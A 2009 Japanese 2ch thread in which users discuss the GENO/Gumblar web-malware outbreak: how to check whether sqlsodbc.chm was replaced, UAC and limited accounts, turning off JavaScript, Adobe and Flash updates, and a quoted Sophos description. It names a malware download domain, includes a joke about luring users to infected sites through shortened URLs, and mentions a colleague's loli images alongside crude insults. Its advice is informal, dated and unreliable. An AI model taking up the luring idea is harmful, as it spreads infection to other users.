713 クレマチス(コネチカット州):2009/05/18(月) 00:22:54.71 ID:wcxMf4Dr
だから、電源オフもしたらアカンし、
再起動もしたらアカンのかよOrZ

寝れねぇ〜〜〜〜


714 オウバイ(大阪府):2009/05/18(月) 00:22:58.23 ID:ker7VPvN
>>29
これってfirewallで閉じといたほうが楽じゃね
にしても去年後半あたりから445ポートへのアクセスがすごいことになってるなw
715 スィートアリッサム(群馬県):2009/05/18(月) 00:23:07.99 ID:GFOrMtLQ
ネットを根絶し再び視聴者を取り戻そうとする、
TV原理主義者達の陰謀だったんだよ!
716 ポピー(長崎県):2009/05/18(月) 00:23:11.01 ID:SD6G7ePy
しかしこうなってくると、携帯厨が「ざまあああああwwwww」って喜ぶのが目に見えて
なんかイラッとくる
717 イヌガラシ(大阪府):2009/05/18(月) 00:23:22.13 ID:QqlJkDir
>>707
http://www.forest.impress.co.jp/lib/sys/file/fileuty/hashtabshlex.html
これいれとくと、右クリックでみられるようになる
718 タマザキサクラソウ(東京都):2009/05/18(月) 00:23:35.26 ID:RIR9Bq1S
>711
これ一体どういう経緯の話なんだ?
719 オオジシバリ(チリ):2009/05/18(月) 00:23:57.51 ID:l+oX7WDr
>>696
でも実際どうなるかわかんねーじゃん?

今からとりあえず全ドライブavastでもう一回検査して、問題なければ消えたら嫌なデータを外付けに移して
外付けはしばらく封印するわw

>>702
安心ってのは分かるんだけどね・・・
でもふと気づいたときにサービスやらプロセスやらいじれないのはなんか嫌というか・・・
ていうか制限ユーザにしたらタスクトレイにavast表示されないんだよね・・・
720 アカシデ(東京都):2009/05/18(月) 00:24:47.58 ID:whIZ9qIO
>>698
窓の外に飛び込め
721 オウバイ(大阪府):2009/05/18(月) 00:25:01.85 ID:ker7VPvN
>>719
新ユーザー作ってそっちを管理者にすればよくね
タスクトレイは通知領域いじってもだめなのか?
722 スズメノヤリ(アラバマ州):2009/05/18(月) 00:26:40.42 ID:J9GtrxeU
http://www29.atwiki.jp/geno/pages/14.html


ここの該当IPアドレス云々って書かれてるとこのリンク先って何なの?
723 キソケイ(長屋):2009/05/18(月) 00:27:11.00 ID:HVH4U56O
>>697
こういうやつらって2chをアングラサイトと認識してんのかな
724 クモイコザクラ(三重県):2009/05/18(月) 00:27:49.34 ID:8p/iVIpB
>>711
>鳥インフルエンザ
>鳥インフルエンザ
>鳥インフルエンザ
725 ラフレシア(大阪府):2009/05/18(月) 00:27:51.44 ID:RcVtYHrR
>>683
いや、Meもダメだったんじゃね?
RPCの脆弱性付く奴だったから
726 ニガナ(東京都):2009/05/18(月) 00:27:59.26 ID:zpP0Syph
>>718
汚染中のGENOへの短縮URL貼ってた馬鹿がいて、その短縮URLをzipと勘違いした馬鹿がいたって話
727 ハナワギク(dion軍):2009/05/18(月) 00:28:08.06 ID:RsWM+D3f
>>699
一昨日までプニルだったけどopera使いやすいぞ
火狐はなんか面倒だったけど、operaは使いやすいわ
728 ダリア(栃木県):2009/05/18(月) 00:28:17.41 ID:7EQSi5LN
>>682
このご時世じゃ解雇の理由の一つになりかねないけどな
729 タツタソウ(静岡県):2009/05/18(月) 00:28:27.45 ID:eEziWn+k
このウイルス作った奴死ねばいいのにねー
730 シザンサス(アラバマ州):2009/05/18(月) 00:28:27.88 ID:jznykNpy
>>718
前回Geno自体が初出のときに、
Genoのアドレス(www.geno-web.jp)についてさえ気を付けてれば良いと思って油断してた奴らが
TinyURL.comみたいなサイトを使った短縮URLに騙されてアドレスを踏んじゃった
731 ノゲシ(dion軍):2009/05/18(月) 00:29:03.82 ID:h8yyoJbx
>>718
会社からネットやってたらうっかりGENO踏んじゃって信用丸つぶれってとこじゃないか?
俺んとこでは考えられん情報リテラシーだが……
732 マリーゴールド(神奈川県):2009/05/18(月) 00:29:09.32 ID:z9z0Zyan
>>718
休日出勤してるときに会社でzip落としてて
誰かが貼り付けた短縮アドレスでgenoウイルス食らって
首になった人
733 プリムラ・マルギナータ(静岡県):2009/05/18(月) 00:29:20.57 ID:cuJj9jEA
//www■pref■fukushima■jp/jidou/gakkoutebiki/q8-10■pdf

このサイトやばい?
734 ジュウニヒトエ(長屋):2009/05/18(月) 00:29:25.66 ID:xNck+Nwe
危険度1000%踏んだけど無事っぽい
735 ロウバイ(dion軍):2009/05/18(月) 00:29:36.62 ID:JZibt8g2 BE:239172645-2BP(0)

恥ずかしながらさっきこのウイルスの情報しったんだけど、
これって代表的なのはこいつでいいの?
ttp://www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html

まとめサイトのリンクとかにアンチウイルスのベンダーのリンクないからネタかと思ったよ。
っていうかsophosも確認したの4/30なんだな。
736 ショウジョウバカマ(和歌山県):2009/05/18(月) 00:29:48.83 ID:YzqxMqo2
ハッシュも正常な値だった
avastも前から入ってたし

感染はしてないっぽい

さて 明日は職場のマシン総チェックだ
大半は制限ユーザーだから問題ないだろうけど
めんどくせーな
737 ねこやなぎ(青森県):2009/05/18(月) 00:30:14.11 ID:Vcczn7qt
明日以降エロzipスレに短縮URLでウィルスサイト踏ませるか
738 オオジシバリ(チリ):2009/05/18(月) 00:30:21.64 ID:l+oX7WDr
>>721
それはやった
通知領域いじるのg(ry

ていうかそもそも互換シェル使ってるからそっちの問題もあるし、そしてファイル移すのめんどいから外付け以外はもうどうにでもなーれ


もうなんか今回の件で自分がどれだけチキンか思い知ったわ
安心できねぇ・・・
739 タマザキサクラソウ(東京都):2009/05/18(月) 00:30:38.78 ID:RIR9Bq1S
>726>730
解説サンクス。で会社からアクセスした奴がいたのかw
しかもzipと誤認てw
740 カキドオシ(愛知県):2009/05/18(月) 00:30:46.62 ID:VhdL0w68
>>724
人感染で死亡例があるよ。
741 タンポポ(大阪府):2009/05/18(月) 00:31:08.86 ID:2xGikqCb
>707
ファイルを少しでも改変したらハッシュって呼ばれる文字列も変わってしまうんだよ
>717は右クリプロパティで観れるソフト
↑をいれないとみれないよ
742 ハナイバナ(神奈川県):2009/05/18(月) 00:31:18.75 ID:UhWYEB3j
>>737
やった奴らは掘られてるからね
まぁ猶予扱いだったはずだが
743 ガーベラ(大阪府):2009/05/18(月) 00:31:20.89 ID:8Dk4dMgE
>>737
情強なら感染しないから安心だね♪
744 カキツバタ(長野県):2009/05/18(月) 00:31:20.44 ID:/XN5olg7
こんなウイルスだらけのインターネッツに居られるか!
私は自分の部屋で寝かせてもらう!
745 ねこやなぎ(青森県):2009/05/18(月) 00:31:28.01 ID:Vcczn7qt
>>738
vistaか7いれれば?
746 ヤエヤマブキ(神奈川県):2009/05/18(月) 00:31:46.23 ID:gWCqVqFf
>>697
私用ネット程度で退職に追い込む会社って・・・
むしろ辞めて正解じゃないの?w
GENOにかかったところで上司が戒告食らう程度だろ、普通は。
747 シザンサス(アラバマ州):2009/05/18(月) 00:32:46.75 ID:jznykNpy
>>742
複数板で報告されても2レスまでなら大丈夫だよね!
748 スズメノヤリ(アラバマ州):2009/05/18(月) 00:32:47.88 ID:J9GtrxeU
誰か>>722について教えてくれよ
749 スズメノヤリ(東京都):2009/05/18(月) 00:32:56.86 ID:s+nyZ3fG
GENOに掛かるって事が企業にとってどれだけやばいか分かってないなお前
750 ショウジョウバカマ(和歌山県):2009/05/18(月) 00:33:05.14 ID:YzqxMqo2
ネットじゃGENOウィルス
巷では豚インフル

しかも関西で二次感染出現したみたいだし

電車乗るのやだなー
751 オオジシバリ(チリ):2009/05/18(月) 00:33:20.92 ID:l+oX7WDr
>>745
それが一番だが先立つものがね・・・
VMいれてubuntuあたりでネット巡回しようかな・・・
752 ジュウニヒトエ(長屋):2009/05/18(月) 00:33:37.47 ID:xNck+Nwe
ページ読み込んでる時に閉じたけどせーふ?
cmdとか起動した
なんとかのディスクサイズも大丈夫だった
753 ユリノキ(関西地方):2009/05/18(月) 00:33:38.62 ID:/NWPpno0
754 ハナイバナ(神奈川県):2009/05/18(月) 00:34:41.58 ID:UhWYEB3j
>>747
1レスで焼かれた携帯がいたなそいや
755 シラー・カンパヌラータ(コネチカット州):2009/05/18(月) 00:34:42.69 ID:qg9pk2qQ
GENOウイルスと豚インフルウイルスってどっちが強いの?
756 シャクヤク(福島県):2009/05/18(月) 00:34:50.77 ID:0JUYVGeH
個人のPCは、7も年末には発売されるし、
コレを期に7のRC入れて年末までがんばるかな

会社のPCはシステム部門の奴らが面倒見てるから、
もうどうにでもなーれ状態だなw
757 ウシハコベ(大阪府):2009/05/18(月) 00:35:02.20 ID:ggFdXisF
むふーなんだか困った感じだね
758 ポピー(長崎県):2009/05/18(月) 00:35:07.11 ID:SD6G7ePy
>>746
え゛?
759 スズメノヤリ(関東・甲信越):2009/05/18(月) 00:35:38.88 ID:oKbYm3QL
とりあえずSP1か2だがフラッシュプレーヤーとリーダーを最新にした俺は生き残れるかな
760 タンポポ(大阪府):2009/05/18(月) 00:36:00.55 ID:2xGikqCb
>752
再起動で異変がないか、とタスクマネージャでCPUの使用率に異常がないかチェック

あとはマトメサイトでもみるといいんじゃないかな
761 スズメノヤリ(アラバマ州):2009/05/18(月) 00:36:02.09 ID:/A8VHK8/
>>711
こいつが死霊のえじきで基地にゾンビを引き込む奴に見えてきたわ
762 ナツグミ(埼玉県):2009/05/18(月) 00:36:08.26 ID:WGSrXjw3
>>748
urlなんか踏まねえよ
763 クリサンセコム・ムルチコレ(catv?):2009/05/18(月) 00:36:12.29 ID:TegisLD6
いまさっきGENOウイルス流れてるって知ったわ
とりあえずは大丈夫みたいだが、おそろしい・・・
764 タニウズキ(青森県):2009/05/18(月) 00:36:12.41 ID:LjzKO0IL
豚インフルは弱毒性だし薬剤が効くだけマシだろ
765 レウイシア(中部地方):2009/05/18(月) 00:36:39.75 ID:zSEyZWkB
749 名前:[名無し]さん(bin+cue).rar[sage] 投稿日:2009年05月18日(月) 00:33:18 ID:kOR/iv040 (PC)
コマンドプロンプトとregeditが起動できる亜種が出回り始めたらしい(´・ω・) ス
766 オオイヌノフグリ(静岡県):2009/05/18(月) 00:37:34.36 ID:mM9Gb6La
>>764
タミフル、リレンザともに有効らしいからな
767 タツタソウ(静岡県):2009/05/18(月) 00:37:48.24 ID:eEziWn+k
これウイルス駆除ソフトほとんど意味がないって事だよね
この先対応できるのかしら
768 アメリカヤマボウシ(東京都):2009/05/18(月) 00:37:50.11 ID:X/fxqi3q
Sleipnirなら
オプション→ビュー→Tridentで
デフォルトをJS無効、ActiveXの実行を許可しないようにすればOK
769 スィートアリッサム(中部地方):2009/05/18(月) 00:37:57.10 ID:9SGcW/pM
その亜種に感染した人はいるのか
770 タマザキサクラソウ(東京都):2009/05/18(月) 00:38:03.76 ID:RIR9Bq1S
>746
感染だけならシステムの復元でクビは繋がった気がするw
771 スィートアリッサム(東京都):2009/05/18(月) 00:38:06.52 ID:NepheXOn
同人板のスレでコテハンが湧き始めたな
正直自治厨はがウザイから消えて欲しいんだが
どWikiみれば現時点での対策は全部できるんだしイラネ
772 ポピー(長崎県):2009/05/18(月) 00:38:19.93 ID:SD6G7ePy
他板より

401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
 え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
 作成されるファイルを仮想PCで確保してみました。
 ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)

 gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
 対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。
 qlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
 感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
 ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

 あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
 バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。
 このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
 するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。


433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。 
cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。
これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 
同人板その他、パンデミック状態になったの理解できるわ。
773 オニタビラコ(愛知県):2009/05/18(月) 00:38:30.93 ID:AuiekFIQ
Noscriptを設定して>>38のサイトを踏んだが問題なかったぜ
774 ウバメガシ(アラバマ州):2009/05/18(月) 00:39:11.98 ID:3yhD2piE
アドビにはアクセスして平気なのか?
775 ニオイタチツボスミレ(東日本):2009/05/18(月) 00:39:39.07 ID:THM2Xtjn
またvista大勝利か
776 ショウジョウバカマ(和歌山県):2009/05/18(月) 00:39:45.36 ID:YzqxMqo2
>>756
面倒見るほうのみにもなってくれよ

通常業務+全台チェック&対策
全社員への徹底周知

おじさん泣いちゃいそうだよ
777 コスミレ(茨城県):2009/05/18(月) 00:39:55.88 ID:M5jfGiCV
>>704
試しに ftp localhost とかやって接続に失敗させてみると、どうなるかな?
書き換わるのなら、感染確認に利用出来そうな気がするんだけど。
778 ニガナ(東京都):2009/05/18(月) 00:40:54.51 ID:zpP0Syph
>>733
今virustotalに投げてるけど、何かあったのか?
779 シナミズキ(大阪府):2009/05/18(月) 00:41:25.52 ID:5hSkux6L
こういうときだけvistaたんは役に立つ ツンデレなんだね
780 ケンタウレア・モンタナ(福岡県):2009/05/18(月) 00:41:29.61 ID:Rd0s9LV8
不用意にネットサーフィンしなければ感染しないんでしょ?
781 ニオイタチツボスミレ(東日本):2009/05/18(月) 00:41:46.33 ID:THM2Xtjn
VistaでUACを有効にしてる奴なんているのか?

あれ異常に邪魔だろ・・・
782 サクラソウ(関東・甲信越):2009/05/18(月) 00:42:00.01 ID:BsWrPXAR
ネットもリアルもフェーズ6に移行直前かよ
今のところvistaんが頑張ってるけど亜種にスルーされたらと思うとネット出来ねえ
783 ビオラ(宮城県):2009/05/18(月) 00:42:39.92 ID:nQjoclSR
>>780
javascript切ってればとりあえずいいよ
784 スズメノヤリ(アラバマ州):2009/05/18(月) 00:42:44.98 ID:J9GtrxeU
>>781
使ってない奴がいるなんて・・
785 シンビジューム(東京都):2009/05/18(月) 00:42:55.73 ID:Hm+iVQoT
Win7マシンで成美堂出版見てきて、avastインスコして再起動後のスキャンで、
c:users/userneme/appdata/local/microsoft/windows/tenporary internet files/low/content.IE5/RY64BB4P/の
ディレクトリでJS:Redirector-H4確認

発症はしてないと思うけど、ヤバイサイトは見に行かない方が良い
786 オオジシバリ(チリ):2009/05/18(月) 00:43:09.60 ID:l+oX7WDr
ていうかさ、今回のコレってFTP使用しないPCだと感染してもほぼ無害ってこと?
それとも、FTPのID/PASS強奪はあくまで一面で、キーロガー的に外部にパスとかもらしちゃうの?
787 スズメノヤリ(アラバマ州):2009/05/18(月) 00:43:27.09 ID:J9GtrxeU
>>762
安全だって事は確実
ただ意味が分からない
788 シャクヤク(福島県):2009/05/18(月) 00:43:34.64 ID:0JUYVGeH
>>776
マジでお疲れさまッス

うちの会社ではたぶん明日はなんもお触れまわらんだろうな(泣
朝一で全社員へメール流れていたら奇跡だわ・・・orz
789 ニオイタチツボスミレ(東日本):2009/05/18(月) 00:43:53.71 ID:THM2Xtjn
MS:「VistaのUACはユーザーをいらいらさせるために搭載した」
http://japan.cnet.com/news/sec/story/0,2000056024,20371347,00.htm
790 シザンサス(アラバマ州):2009/05/18(月) 00:44:18.40 ID:jznykNpy
>>781
家出るときに鍵かける奴なんているのか?と同レベル
791 シナノナデシコ(関東・甲信越):2009/05/18(月) 00:44:20.50 ID:UkdoReae
もうネトサフできないじゃねえかorz
792 スカシタゴボウ(東日本):2009/05/18(月) 00:44:26.21 ID:YQEavO2e
>>776
Javascript切らせますか?現実的じゃない気がして
793 ビオラ(宮城県):2009/05/18(月) 00:44:30.83 ID:nQjoclSR
>>786
FTPの盗聴はあくまで艦船を広げるためのものだろう
後ろでbotnet起動したりしてるみたいだから油断はしない方がよさそうな
794 シラン(コネチカット州):2009/05/18(月) 00:44:35.98 ID:tFVgFEbp
Vista+IE8保護モード最強他はクソ
795 ラッセルルピナス(茨城県):2009/05/18(月) 00:44:46.24 ID:3lnjSZJ3
これはMSの陰毛だな
796 カタバミ(東京都):2009/05/18(月) 00:44:59.60 ID:p0L71iBk
具体的な被害ってあるの?
情報流出先はわからんの?
797 ハナイバナ(神奈川県):2009/05/18(月) 00:45:11.42 ID:UhWYEB3j
>>746
50 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 00:33:18.70 ID:8fz7e8f5
リアルにPCやられた。IEが強制終了される。しばらくZIPはふむな。
162 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:05:12.95 ID:8fz7e8f5
ああ本当に壊れた
再インストールすらさせてもらえない
何かしようとしても強制終了される。
204 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 01:15:09.39 ID:8fz7e8f5
》167ありがとうございますけど駄目でした。
今遠隔サービスで見て貰っていますがソフト入れ替えと言われた。会社のPCでZIP落としていた罰が当たりました。日曜出動までして何してんだろ俺?もう帰宅します。明日上司になんて説明しようか?
995 名前: ヒマラヤユキノシタ(コネチカット州)[] 投稿日:2009/04/06(月) 09:53:37.05 ID:8fz7e8f5
会社のPCでZIP落としてるのばれた。
本当に死にたい。
144 名前: ケンタウレア・モンタナ(コネチカット州)[] 投稿日:2009/04/06(月) 10:55:46.05 ID:8fz7e8f5
自宅謹慎になったわ
940 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:04:22.10 ID:AhXwTJEf
ID:8fz7e8f5 ですが自宅のPCから書き込み
自主退社という形になりました
逝ってきます
このウイルスが世界中に広がりますように
55 名前: ミツマタ(東京都)[] 投稿日:2009/04/06(月) 18:35:10.80 ID:AhXwTJEf
釣りだと思われるのはしゃくなので
IEの強制終了のせいで発注できず
ウイルスの原因が2CHでエロZIp
PCと自前のHDD回収される
生き恥をさらす
大量のロリ画像で性犯罪者扱い
どぷするの?と上司
自主退社←今ここ
このスレに気づかずに管理人に連絡とったのが悔やまれる
798 ジシバリ(埼玉県):2009/05/18(月) 00:45:38.16 ID:MAYIasKV
Vista最強伝説
Opera最強伝説
799 アブラチャン(福島県):2009/05/18(月) 00:46:10.73 ID:YDfKi0ag
対策はしたけど気持ち悪いよう
800 ゲンカイツツジ(長崎県):2009/05/18(月) 00:46:18.14 ID:Oquv1w87
sqlsodbc.chmを探してたら、spider.exeっていう怪しいファイルが入ってた。
ちょっとWクリックしたら、なんかトランプがたくさん出てきたんで慌てて×を押した。
これウイルスバスターで消したほうが良い?
801 姫カンムリシャジン(石川県):2009/05/18(月) 00:47:00.87 ID:DSuVx5x2
>>797
ZIPの偽装URL踏んだ人か
802 オウバイ(大阪府):2009/05/18(月) 00:47:38.91 ID:ker7VPvN
UACの何がめんどくさいんだよw
インスコの時ぐらいだろ出てくんの
デジタル署名がないって言ってくるならブロック解除してやればいいし意味がわからん
一日一回でるかでないかの話なのに
803 スズメノヤリ(埼玉県):2009/05/18(月) 00:47:45.24 ID:3D/yscoV
>>800
スパイダーってゲームを知らんのか
804 オキザリス(新潟県):2009/05/18(月) 00:47:52.81 ID:dejPNUbF
インターネット詳しくないけどvista大丈夫のようね。よかった。
805 ケンタウレア・モンタナ(福岡県):2009/05/18(月) 00:48:47.35 ID:Rd0s9LV8
>>797
明日会社行ってこんな話になってたら引く
806 ニガナ(東京都):2009/05/18(月) 00:48:48.38 ID:zpP0Syph
JavaScriptだけで見るとそれ切るだけで別に済むんだけど
問題の本質はAdobe ReaderとFlashの脆弱性だからな
807 ポピー(コネチカット州):2009/05/18(月) 00:48:50.78 ID:/5XkzXo8
これってウィルスバスターで検索かければウィルス見つかります?あと これを機にインターネットエクスプローラ7からoperaに乗り換えようと思うのだが如何?ちなみに今はVista32ビットです
808 シキミ(東京都):2009/05/18(月) 00:49:07.10 ID:wOaST/LT
>>800
消したほうがいいよ
809 オニタビラコ(愛知県):2009/05/18(月) 00:49:27.44 ID:AuiekFIQ
>>800
壮大にフイタw
810 キショウブ(長屋):2009/05/18(月) 00:49:31.74 ID:Cz9BcG1j
>>800
もう駄目かもしれんね
811 スズメノヤリ(アラバマ州):2009/05/18(月) 00:50:18.98 ID:/A8VHK8/
812 ビオラ(宮城県):2009/05/18(月) 00:50:34.35 ID:nQjoclSR
>>806
Adobe ReaderとFlash Playerも中で使ってるJavascriptが脆弱性の原因だったり

あれ?JavaScriptが死ねばよくね?
813 ニガナ(東京都):2009/05/18(月) 00:51:31.86 ID:zpP0Syph
>>812
結局そうなんだけど、一歩間違うとブラウザのJavaScript切るだけで良いんだーになりかねないからね
アップデート忘れんなと
814 ショウジョウバカマ(和歌山県):2009/05/18(月) 00:51:41.41 ID:YzqxMqo2
>>792
まずAdobeとか最新Verになってるか確認
なってなきゃ例の確認方法してみる

Javascriptはどうすんだろうね

上の人間がどう判断するかはわからん

ま自分と上司以外は制限ユーザだから大丈夫だとは思うけど
815 ジャーマンアイリス(茨城県):2009/05/18(月) 00:51:48.92 ID:Xlbr/WNT
ftp localhost じゃなくて、anonymous サーバに接続してみるという方法もあるな…
816 アザミ(兵庫県):2009/05/18(月) 00:53:40.20 ID:7OUjWx05
やばそうな感じ出してるけどパート5ってどういうことなんだ?
そんなにやばくないのか?
817 オランダミミナグサ(東京都):2009/05/18(月) 00:54:17.84 ID:0LOIUa0M
>>797
ああこれ俺だ
無事再就職できました

もっとGENOウイルス広まれよ
818 ムラサキハナナ(中部地方):2009/05/18(月) 00:54:29.53 ID:LHIAkNmf
飽きてきた
819 ヤエザクラ(福岡県):2009/05/18(月) 00:55:00.38 ID:bQYWsUeu
>>816
大騒ぎしている人間も居るが冷静な判断をしたら
そう大変じゃなかったんだぜの巻き
820 桜(福岡県):2009/05/18(月) 00:55:06.29 ID:K80uLwbM
>>817
よかったな
821 ヤエザクラ(福岡県):2009/05/18(月) 00:55:54.00 ID:bQYWsUeu
>>817
おめでとう
822 ナツグミ(埼玉県):2009/05/18(月) 00:56:15.90 ID:WGSrXjw3
>>787
書いてあるとおり、遮断した方が良いんじゃね?っていうIPアドレスの範囲じゃないの?
823 オオジシバリ(チリ):2009/05/18(月) 00:56:46.87 ID:l+oX7WDr
IPブロック指定マンドクセ

もういいや、寝よう。
ていうか明日は会社の自分のPCも確認せにゃならんし、親のPCも心配だし
824 ヒサカキ(東京都):2009/05/18(月) 00:57:07.95 ID:qH+pRkPf
>>817
何その良い話
825 マムシグサ(岡山県):2009/05/18(月) 00:57:19.81 ID:uKaX8zMq
>>817
よかったな
お祝いに今度zipやるから会社で落としてくれ
826 ねこやなぎ(catv?):2009/05/18(月) 00:57:43.83 ID:JKLPCiZP
>>825
warota
827 オウバイ(大阪府):2009/05/18(月) 00:58:14.83 ID:ker7VPvN
知らんけどwikiのIPは実行ファイルを送りつけてくるとこじゃないの
828 ビオラ(宮城県):2009/05/18(月) 00:58:19.50 ID:nQjoclSR
JavaScriptとかこの世から消滅しろよ〜
829 姫カンムリシャジン(石川県):2009/05/18(月) 00:58:44.70 ID:DSuVx5x2
>>817
また偽装アドレス踏んでこいよ
830 オランダミミナグサ(東京都):2009/05/18(月) 00:59:12.45 ID:0LOIUa0M
>>825
あれからZIPは落としてないw
つうかHDDも全部処分した
結構本気で反省したわ
831 ダリア(栃木県):2009/05/18(月) 00:59:29.66 ID:7EQSi5LN
>>785
ネットの一時ファイルだな・・・
832 シンフィアンドラ・ザンゼグラ(空):2009/05/18(月) 01:00:15.78 ID:FVcv4/Nr
vistaの奴はもう寝ろ。
833 アザミ(兵庫県):2009/05/18(月) 01:00:32.72 ID:7OUjWx05
俺毎回ウイルススレ見つけると焦るんだけど
良く考えたらそんなにもれて困るデータもないし
クレジットカードも使ってないし
ハゲるわ〜
834 ダリア(栃木県):2009/05/18(月) 01:00:59.13 ID:7EQSi5LN
>>830
性犯罪者扱いされた気分はいかがかね
835 スズメノヤリ(dion軍):2009/05/18(月) 01:01:22.38 ID:VRI3isq0
こういうのだとほっとしないか?
http://up2.viploader.net/pic/src/viploader1020375.gif
836 ギシギシ:2009/05/18(月) 01:01:26.25 ID:t9HYlcXp
>>830
そのままニートになって死ねばよかったのに
837 桜(福岡県):2009/05/18(月) 01:01:47.58 ID:K80uLwbM
>>830
処分する前に公開鯖立てて欲しかったな。
838 ワスレナグサ(山口県):2009/05/18(月) 01:02:09.93 ID:C2kJXMRh
とりあえずFP最新版にしてNoScript入れてフラッシュ切った
839 シンフィアンドラ・ワンネリ(愛知県):2009/05/18(月) 01:03:21.98 ID:HZPNuQKm
>>830
ロリコン乙
840 オランダミミナグサ(東京都):2009/05/18(月) 01:03:38.38 ID:0LOIUa0M
何とでも言え
悪いのは自分だ
841 ヤエザクラ(東日本):2009/05/18(月) 01:03:55.52 ID:laW8eyVd
とりあえず会社のFTPのパスワードだけ変更しておいたぜ
システム担当者として明日以降が思いやられるわマジで・・・
842 リナリア(西日本):2009/05/18(月) 01:03:56.02 ID:jn0Hi/p0
とりあえず家のPCは全部入ってるアドビアップデートさせた
843 ねこやなぎ(catv?):2009/05/18(月) 01:04:06.69 ID:JKLPCiZP
こうやって強くなっていくんだな
844 オオニワゼキショウ(北海道):2009/05/18(月) 01:04:49.52 ID:bTQX5hTl
怖くてメールチェックできない(´・ω・`)
でもチェックしないと大量に(´・ω・`)
845 ワスレナグサ(千葉県):2009/05/18(月) 01:05:37.62 ID:dh9NPfeq
家族用のPCのXPのやつに対策してみたけど、父親とか何もわからずに実行しそうで怖いわw
アドミニストレータ権限なくせば万全かしら?
846 アザミ(兵庫県):2009/05/18(月) 01:05:39.21 ID:7OUjWx05
特定のサイトだけFLASHとかJSとかオンにでききるような設定とかできないののの?
847 ヒサカキ(東京都):2009/05/18(月) 01:05:49.97 ID:qH+pRkPf
ほう、経験が生きたな
848 ケンタウレア・モンタナ(福岡県):2009/05/18(月) 01:05:55.73 ID:Rd0s9LV8
>>840
次は何の仕事?
849 スズメノヤリ(福井県):2009/05/18(月) 01:07:05.12 ID:/B8NQEWs
Operaに続いてVistaが最強伝説を確立してしまったのか
850 ポレオニウム・ボレアレ(コネチカット州):2009/05/18(月) 01:07:12.84 ID:tFVgFEbp
二次元も三次元もパンデミックでござる の巻
851 ビオラ(宮城県):2009/05/18(月) 01:07:31.03 ID:nQjoclSR
>>846
IEなら信頼済みサイトとかに割り振ればレベルによってActiveX切ったり出来る
FirefoxならNoScriptとかでサイトごとに切れる

ただし全面停止推奨だな今は
次訪問したときに感染してないとは限らないのが恐ろしい
852 ニガナ(東京都):2009/05/18(月) 01:07:53.31 ID:zpP0Syph
>>846
それが手軽に出来るのがOpera。最近悪さして話題になったNoScript使いたいのならFirefox
どうぞ御自由に
853 ショウジョウバカマ(和歌山県):2009/05/18(月) 01:08:11.52 ID:YzqxMqo2
三次元のパンデミックのほうも府庁からお知らせが来るんだろうな
854 ヤマブキ(鹿児島県):2009/05/18(月) 01:09:41.45 ID:IqpFp9wA
成美堂踏んじゃったけど50.727バイトって出たから大丈夫?
855 アブラチャン(catv?):2009/05/18(月) 01:10:05.43 ID:6/7/nX9Q
くだらないデマだがやり口が悪質
856 ローダンゼ(奈良県):2009/05/18(月) 01:10:46.90 ID:CSvVotDe
>>852
別にOperaだけじゃねーだろ
857 スズメノヤリ(富山県):2009/05/18(月) 01:10:58.04 ID:5lHI9U8y
Troj/JSRedir-R is a malicious script likely to have been injected into a defaced web page to load remote malicious content when the page is viewed.
Analysis of many defaced sites has shown that many examples of Troj/JSRedi-R are buggy and do not work.

Websites affected with Troj/JSRedir-R may also see detections of Troj/PHPMod-A.

Working copies of Troj/JSRedir-R will redirect users to a Chinese Domain (hosted in Russia) and then via a series of PDF and SWF exploits attempt to install malware detected as Troj/Daonol-Fam.

For more information on this threat see the SophosLabs Blog.

www.sophos.com/security/analyses/viruses-and-spyware/trojjsredirr.html
858 ニガナ(東京都):2009/05/18(月) 01:11:15.20 ID:zpP0Syph
>>856
じゃあ一緒に教えましょ
859 西洋オキナグサ(アラバマ州):2009/05/18(月) 01:11:22.85 ID:ZKtnQPRw
VistaUserはもうあんま関係ないからあらしと咲見て寝ようぜw
860 ニリンソウ(dion軍):2009/05/18(月) 01:11:28.21 ID:nOBa9mCf
同人板ってだいぶ前からウィルス攻撃されてたろ
あれも作った奴が少しずつ改良して運営と住人の対策無効化してたよなあ
そんで今回のは自分で勝手に改良して進化いくわけか
災難だな同人
861 シラネアオイ(コネチカット州):2009/05/18(月) 01:11:31.15 ID:wBbFbW02
もう再起動出来たしいいや寝る
862 ホトケノザ(関西地方):2009/05/18(月) 01:12:06.30 ID:ns+NT8Pq
java切るわけにはいかないんでFLASHとAdobe reader無効にしてる
不便すぎる
863 カンパニュラ・アーチェリー(熊本県):2009/05/18(月) 01:12:42.53 ID:8e2aa5ov
まとめサイトが感染したらどうなるんだろう
864 エビネ(ネブラスカ州):2009/05/18(月) 01:12:54.17 ID:wM4NjIyq
やっぱシルバーライト最強だな。
865 オオジシバリ(チリ):2009/05/18(月) 01:13:20.72 ID:l+oX7WDr
寝る前の最終チェック

1.avastのインスコとwebスキャナの有効化
2.adobe製品を使わない。使うなら最新版を。 adobe reader 9.1.1 flash player 10.0.22.87
3.Foxitreader 等PDFreaderはjavascriptでの操作は不可に
4.IE8に乗り換え
